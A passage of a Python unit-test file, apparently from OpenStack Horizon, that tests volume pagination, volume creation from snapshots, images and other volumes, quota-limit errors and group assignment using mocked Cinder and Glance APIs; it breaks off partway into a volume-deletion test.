search_opts=None)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
return res
def ensure_attachments_exist(self, volumes):
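        # Make sure every volume reports at least one attachment (with a
        # placeholder server id) before it is fed to the paginated index.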
volumes = copy.copy(volumes)
for volume in volumes:
if not volume.attachments:
volume.attachments.append({
"id": "1", "server_id": '1', "device": "/dev/hda",
"attachment_id": ATTACHMENT_ID})
return volumes
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# get first page
expected_volumes = volumes[:size]
url = INDEX_URL
res = self._test_index_paginated(None, "desc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get second page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get last page
expected_volumes = volumes[-size:]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
False, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated_prev_page(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# prev from some page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# back to first page
expected_volumes = volumes[:size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
class VolumeViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
def tearDown(self):
for volume in self.cinder_volumes.list():
# VolumeTableMixIn._set_volume_attributes mutates data
# and cinder_volumes.list() doesn't deep copy
for att in volume.attachments:
if 'instance' in att:
del att['instance']
super().tearDown()
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_without_name(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': '',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
cinder: ['volume_type_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'volume_snapshot_list',
'volume_snapshot_get',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A copy of a volume',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
redirect_url = INDEX_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], None, metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=volume.id)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['volume_snapshot_get',
'volume_type_list',
'volume_type_default',
'volume_get',
'group_list'],
})
def test_create_volume_from_snapshot_invalid_size(self):
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.mock_volume_snapshot_get.assert_called_with(test.IsHttpRequest(),
str(snapshot.id))
self.mock_volume_get.assert_called_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_default',
'volume_type_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
        self.mock_volume_type_list.return_value = \
            self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_once_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed',
'image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_snapshot_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_create',
'group_list'],
})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def test_create_volume_from_image_under_image_size(self):
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 1, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
msg = ("The volume size cannot be less than the "
"image size (20.0\xa0GB)")
self.assertFormError(res, 'form', None, msg)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def _test_create_volume_from_image_under_image_min_disk_size(self, image):
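        # Shared helper: requesting a volume smaller than the image's
        # min_disk must be rejected with a form error.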
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 5, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
def test_create_volume_from_image_under_image_min_disk_size(self):
image = self.images.get(name="protected_images")
image.min_disk = 30
self._test_create_volume_from_image_under_image_min_disk_size(image)
def test_create_volume_from_image_under_image_prop_min_disk_size_v2(self):
image = self.imagesV2.get(name="protected_images")
self._test_create_volume_from_image_under_image_min_disk_size(image)
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_gb_used_over_alloted_quota(self):
formData = {'name': 'This Volume Is Huge!',
'description': 'This is a volume that is just too big!',
'method': 'CreateForm',
'size': 5000}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes', 6))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 80)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['A volume of 5000GiB cannot be created as you only'
' have 20GiB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_volume_list.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_number_over_alloted_quota(self):
formData = {'name': 'Too Many...',
'description': 'We have no volumes left!',
'method': 'CreateForm',
'size': 10}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes',
len(self.cinder_volumes.list())))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume_with_group(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
volume_group = self.cinder_groups.list()[0]
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az,
'group': volume_group.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = self.cinder_groups.list()
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=volume_group.id, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_delete',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_list_paged.return_value = [volumes, False, False]
